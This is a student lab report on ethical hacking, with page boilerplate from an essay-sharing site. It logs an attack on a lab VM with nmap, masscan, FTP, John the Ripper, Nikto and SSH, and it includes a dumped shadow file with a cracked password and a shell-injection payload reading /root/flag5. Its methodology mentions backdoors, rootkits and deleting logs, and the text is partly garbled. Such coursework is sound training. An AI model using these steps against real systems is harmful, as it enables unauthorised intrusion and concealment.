Ethical Hacking and Defence: Practical Assignment Report - Analysis

Verified

Added on 2020/03/16

AI Summary

This assignment is a practical report on ethical hacking and defense, focusing on penetration testing using Kali Linux. The report details the methodologies employed, including reconnaissance, scanning, gaining access, maintaining access, and clearing tracks. It documents the process of attacking a victim machine and gaining system access ethically, emphasizing the use of tools like Nmap, masscan, and Metasploit. The assignment covers identifying active hosts, scanning open ports, exploiting vulnerabilities, and retrieving flags. Specific commands and outputs are provided for each step, including FTP access, password cracking using John the Ripper, and web server exploitation using Nikto. Recommendations for improving network security are also provided. The report concludes with a discussion of the results and recommendations for strengthening system security.

Running head: ETHICAL HACKING AND DEFENCE
Ethical Hacking and Defense
Assignment 2
Name of the Student
Name of the University
Author’s Note

Paraphrase This Document

Need a fresh take? Get an instant paraphrase of this document with our AI Paraphraser

1
ETHICAL HACKING AND DEFENCE
Executive Summary
The report is prepared for testing and attacking a victim machine using kali Linux. An ethical
process is followed for attacking the machine and gain the access of the system. The IT resources
are tested with the principles and techniques used for gaining the access of the machines
connected in the network. It is used for enhancing the security of the network and more time is
spent in gaining the knowledge about ethical hacking and studying the techniques and the tools
used for gaining the access of the workstations. The introduction part defines the different
concepts used for ethical a hacking and helps to increase knowledge about the management of
the risks associated with the workstations and focus is given on the penetration testing.

2
ETHICAL HACKING AND DEFENCE
Table of Contents
1. Overview..........................................................................................................................3
2. Methodology....................................................................................................................3
2.1. Step#1: Reconnaissance............................................................................................3
2.2. Step#2: Scanning......................................................................................................3
2.3. Step#3: Gaining Access............................................................................................4
2.4. Step#4: Maintaining Access.....................................................................................4
2.5. Step#5: Clearing the Tracks......................................................................................4
3. Testing Log......................................................................................................................4
3.1. Flag 1........................................................................................................................4
3.2. Flag 2........................................................................................................................7
3.3. Flag 3........................................................................................................................8
3.4. Flag 4........................................................................................................................9
3.5. Flag 5......................................................................................................................11
4. Results and Recommendations......................................................................................11
5. Source/Instructions: PORT Scanner..............................................................................12
6. Source/Instruction: Password Cracker...........................................................................13
Bibliography......................................................................................................................14
Appendices........................................................................................................................16

3
ETHICAL HACKING AND DEFENCE
1. Overview
Ethical hacking is also known as penetration testing or intrusion testing and it is done to
crack the password of a workstation and gain the access of the machine. The ethical hacking
methodology is used by the hackers to analyze the vulnerability of the workstations connected in
the network and its operating environment. The security of the computers are a major concern for
the government and the business during the growth of the internet and the problems associated
with the organization is analyzed using ethical hacking for evaluation of the threat related with
the computer systems. The computer systems are attempted to break and individually neither
damaging nor stealing the informations from the targeted system. The security of the targeted
system are evaluated and the vulnerability are reported for increasing the security of the system.
2. Methodology
2.1. Step#1: Reconnaissance
The matching information are gained and more information are gathered from the target
system. Different tools can be used for gathering information and the gathering of information
are broken into different steps locating the network range, discovering the ports and the access
points, detection of the operating system, identification of the service and the ports and mapping
of the network. Tools like NSlookup, Whois can be used for gathering the information.
2.2. Step#2: Scanning
The system that are alive can be identified by scanning the network and the IP address of
the system is evaluated. Different scanning tools are available and can be used for getting the
port address and the IP address of the targeted machine.

Paraphrase This Document

Need a fresh take? Get an instant paraphrase of this document with our AI Paraphraser

4
ETHICAL HACKING AND DEFENCE
2.3. Step#3: Gaining Access
The information from the scanning phase are used for gaining the access of the targeted
system. The password in the system can be cracked using brute force attacks and accessing the
password directory files. Keyloggers and spywares can also be used for getting the password of
the targeted machine.
2.4. Step#4: Maintaining Access
Backdoors are created by the hacker for maintaining the access of the system and
different programs can be installed on the machine gather confidential data and control the
system. The rootkit can be used for hiding the utilities that is accessed by the hacker. A kernel
mode device driver _root_.sys contains in the rootkit and a program DEPLOY.EXE is used for
running the rootkit files. This is used to hide the files from the list of directory.
2.5. Step#5: Clearing the Tracks
The activity performed by the hacker on the targeted machine is required to be covered in
order to avoid detection and continue in the access for a longer period of time. The log files are
required to be deleted using the tunneling protocol or altering the log files.
3. Testing Log
3.1. Flag 1
Command used for scanning the active host in the network:
root@kali:~# nmap -sP 192.168.177.0/24
The output of the command:
Starting Nmap 7.50 ( https://nmap.org ) at 2017-10-21 19:32 AWST

5
ETHICAL HACKING AND DEFENCE
MAC Address: 00:0C:29:15:14:71 (VMware)
Nmap scan report for 192.168.177.159
Nmap done: 256 IP addresses (4 hosts up) scanned in 6.28 seconds
The open ports of the targeted host is scanned using the following command:
root@kali:~# masscan 192.168.177.159 --port 1-65535 --rate=10000
The output of the command is
Starting masscan 1.0.3 (http://bit.ly/14GZzcT) at 2017-10-21 11:54:21 GMT
-- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [65535 ports/host]
Discovered open port 110/tcp on 192.168.177.159
Discovered open port 3632/tcp on 192.168.177.159
Discovered open port 80/tcp on 192.168.177.159
Discovered open port 21/tcp on 192.168.177.159
Discovered open port 143/tcp on 192.168.177.159
Discovered open port 995/tcp on 192.168.177.159
Discovered open port 22/tcp on 192.168.177.159
Discovered open port 993/tcp on 192.168.177.159

6
ETHICAL HACKING AND DEFENCE
For finding the service running on the port the following command is used
root@kali:~# nmap -sV -p110,3632,80,21,143,995,22,993 192.168.177.159
Starting Nmap 7.50 ( https://nmap.org ) at 2017-10-21 19:57 AWST
Nmap scan report for 192.168.177.159
Host is up (-0.068s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.1
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu3 (protocol 2.0)
3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
MAC Address: 00:0C:29:CB:D2:55 (VMware)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at
https://nmap.org/submit/
Nmap done: 1 IP address (1 host up) scanned in 10.45 seconds
In the next step the metasploitable console is started using the following command
Msfconsole
The flag 1 fond from the targeted source is:
Flag 1
ii7haeb8muohe9chi5ley4ceime5uzaeca2beeghe0Soqu1thai2Iedae5Wo3ga1le0ia
nihohsaiD4rainaongaingiK5IeNg3uusai8iew1shohd2xie0quaj2xeez

Paraphrase This Document

Need a fresh take? Get an instant paraphrase of this document with our AI Paraphraser

7
ETHICAL HACKING AND DEFENCE
3.2. Flag 2
FTP and BAK command is used for transfer files and allow remote login into the targeted
system. The following command is used logging into the system.
mysql@GNB:~$ ftp 192.168.177.159
The output of the command is given as follows:
Connected to 192.168.177.159.
220 ProFTPD 1.3.1 Server (Debian) [::ffff:192.168.177.159]
Name (192.168.177.159:mysql): bak
331 Password required for bak
Password:
230 User bak logged in
For getting the flag 2 the following command is used
ftp> Get flag2
The output of the command is given below
: local: flag2 remote: flag2
200 PORT command successful
cd etc.o150 Opening BINARY mode data connection for flag2 (129 bytes)
226 Transfer complete
129 bytes received in 0.08 secs (1.5 kB/s)

8
ETHICAL HACKING AND DEFENCE
The flag 2 is given below
cat flag2
eiSuNgoV3gesash2AiZ9AuSahzeeshohcupibaePhori9aixoh7ooPho5udodo3ahTholaeheeShaibaB
2ChaiteeWihoh0eivoo7eig5Eiciav2keejoyuleedoe0ai
3.3. Flag 3
The flag 3 is fetched from the shadow file utilizing the Jason to find the week passwords
and cracking them to get the access of the system. The flag 3 got using the following command
are given below:
root@kali:~# cat shadow
jason:$1$7zc6c28K$uCL6gWf2R0BUxCgS4.93j1:15235:0:99999:7:::
distccd:*:15235:0:99999:7:::
ftp:*:15235:0:99999:7:::
bak:$1$Ibyplkq1$OR8Sz4hdobhx2G79ismfy.:15235:0:99999:7:::
mysql:$1$cPlNI85k$a3KzXO4zuTeCQMCpKOabp0:15235:0:99999:7:::
root@kali:~# john shadow
O: Loaded 3 password hashes with 3 different salts (md5crypt, crypt(3) $1$ [MD5
128/128 AVX 4x3])
Press 'q' or Ctrl-C to abort, almost any other key for status
cupcakes (mysql)

9
ETHICAL HACKING AND DEFENCE
1g 0:00:12:45 3/3 0.001305g/s 4595p/s 9189c/s 9189C/s 0rnady..0rna08
1g 0:00:12:48 3/3 0.001301g/s 4592p/s 9183c/s 9183C/s aann10..aann06
3.4. Flag 4
For getting the flag 4 Nikto tool is used and the command and output are given below:
root@kali:~# nikto -h 192.168.177.159
Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.177.159
+ Target Hostname: 192.168.177.159
+ Target Port: 80
+ Start Time: 2017-10-22 22:33:12 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache/2.2.8 (Unix) PHP/5.2.4
+ OSVDB-3268: /admin/: Directory indexing found.
+ OSVDB-3092: /admin/: This might be interesting...
Flag 3
aiwei7eex6aKohvidah8euPiowah8iesh8eilaido0foo9ahghaen9Oom2zu4eedod1q
uaenahreid9ep3Uiz1iv7YooLohhoh5ouPee4geiXeiru3iesh9ushas0Ief

Paraphrase This Document

Need a fresh take? Get an instant paraphrase of this document with our AI Paraphraser

10
ETHICAL HACKING AND DEFENCE
+ Retrieved x-powered-by header: PHP/5.2.4
+ Cookie PHPSESSID created without the httponly flag
+ OSVDB-3093: /admin/index.php: This might be interesting... has been seen in web
logs from an unknown scanner.
+ /admin/phpinfo.php: Output from the phpinfo() function was found.
+ OSVDB-35877: /admin/phpinfo.php: Immobilier allows phpinfo() to be run.
+ 8345 requests: 0 error(s) and 15 item(s) reported on remote host
+ End Time: 2017-10-22 22:33:52 (GMT8) (40 seconds)
---------------------------------------------------------------------------
1 host(s) tested
For getting the access of the web server the IP address is used and password information are
modified using sql querry.
SELECT * FROM users WHERE username='admin' AND
password='1a1dc91c907325c69271ddf0c944bc72';
In the terminal:
root@kali:~# ssh mysql@192.168.177.159
mysql@GNB:~$ mysql -u root –p
Flag 4
iucohKae4lairo2YaeJaighuu4ahnoh3ahmohquooz1oil3moo0oJoa2ooz7mieZ4ahQ
ueinie4Aix5of0aeRe7Ailooph5aec7poowai6eep9pu4AiQuoo7aeChooNe

11
ETHICAL HACKING AND DEFENCE
3.5. Flag 5
For getting the flag 5 shell injection is done on the flag 4 and the following command is
used;
: ; cat /root/flag5
4. Results and Recommendations
The results got from the ethical hacking and penetration testing on a network is the pen
test report. The report consists of the details of the activity performed during the hacking of the
victim computer system and the types of the test or the methodology used in the hacking. The
vulnerability identified during performing the test are analyzed for suggesting the
countermeasure for removal of the vulnerability from the system. The result of the test is
required to be submitted to the organization in order to secure the system from external agents
and it is required to be kept confidential for minimizing the security risk associated with the
system. If the document falls in the hand of an external agent the security of the organizational
network can be compromised and it would act as the roadmap for all the weakness of the system.
5. Source/Instructions: PORT Scanner
The port scanning is used for identification of the open TCP/IP ports of the victim
machine and there are different port scanning tools that are applied for finding the port address of
Flag 5
chahNaelia9zohlaseiPaich0QuoWoh8ohfaenaiQuaetaebushoakarai6lainohjongon
eesoocahdei6guosiethae7uwuu5Kaid9eisah8EChoo4kaiGh2eit2mu